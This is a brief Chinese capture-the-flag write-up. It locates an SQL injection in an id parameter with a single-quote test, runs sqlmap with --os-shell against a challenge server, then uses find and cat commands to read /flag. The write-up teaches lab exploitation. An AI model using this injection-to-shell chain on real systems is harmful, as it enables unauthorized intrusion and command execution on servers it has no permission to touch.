题目 点击下一篇出现参数id,单引号报错 找到注入点启动sqlmap 用sqlmap的os-shell执行命令获取flag python sqlmap.py -u http://challenge.qsnctf.com:32372/?id=1 --os-shell 执行命令查找flag find / -name flag* find / -name *flag 发现/flag目录,拿下FLAG cat /flag